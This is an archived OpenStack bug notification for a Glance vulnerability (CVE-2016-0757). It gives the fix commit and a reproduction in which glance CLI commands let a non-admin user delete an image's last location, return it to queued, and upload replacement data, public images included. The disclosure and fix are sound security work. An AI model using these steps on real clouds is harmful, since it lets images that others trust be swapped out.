yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #45835
[Bug 1525915] Re: [OSSA 2016-006] Normal user can change image status if show_multiple_locations has been set to true (CVE-2016-0757)
Reviewed: https://review.openstack.org/275737
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=6179e1e98808548f1c12a2b66784cac3c1e5ac0f
Submitter: Jenkins
Branch: master
commit 6179e1e98808548f1c12a2b66784cac3c1e5ac0f
Author: Erno Kuvaja <jokke@xxxxxx>
Date: Tue Jan 19 13:37:05 2016 +0000
Prevent user to remove last location of the image
If the last location of the image is removed, image transitions back to queued.
This allows user to upload new data into the existing image record. By
preventing removal of the last location we prevent the image transition back to
queued.
This change also prevents doing the same operation via replacing the locations
with empty list.
SecurityImpact
DocImpact
APIImpact
Change-Id: Ieb03aaba887492819f9c58aa67f7acfcea81720e
Closes-Bug: #1525915
** Changed in: glance
Status: New => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1525915
Title:
[OSSA 2016-006] Normal user can change image status if
show_multiple_locations has been set to true (CVE-2016-0757)
Status in Glance:
Fix Released
Status in Glance kilo series:
New
Status in Glance liberty series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Committed
Bug description:
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed (private)
security vulnerabilities before their coordinated publication by the
OpenStack Vulnerability Management Team in the form of an official
OpenStack Security Advisory. This includes discussion of the bug or
associated fixes in public forums such as mailing lists, code review
systems and bug trackers. Please also avoid private disclosure to
other individuals not already approved for access to this information,
and provide this same reminder to those who are made aware of the
issue prior to publication. All discussion should remain confined to
this private bug report, and any proposed fixes should be added to the
bug as attachments.
--
User (non admin) can set image back to queued state by deleting
location(s) from image when "show_multiple_locations" config parameter
has been set to true.
This breaks the immutability promise glance has similar way as
described in OSSA 2015-019 as the image gets transitioned from active
to queued and new image data can be uploaded.
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T09:58:54Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:43:23Z |
| virtual_size | None |
| visibility | private |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:43:41Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
This works also on public images.
ubuntu@devstack-02:~/devstack$ . ./openrc admin admin
ubuntu@devstack-02:~/devstack$ glance image-update --visibility=public f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:11Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ . ./openrc
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:45:28Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:43Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1525915/+subscriptions
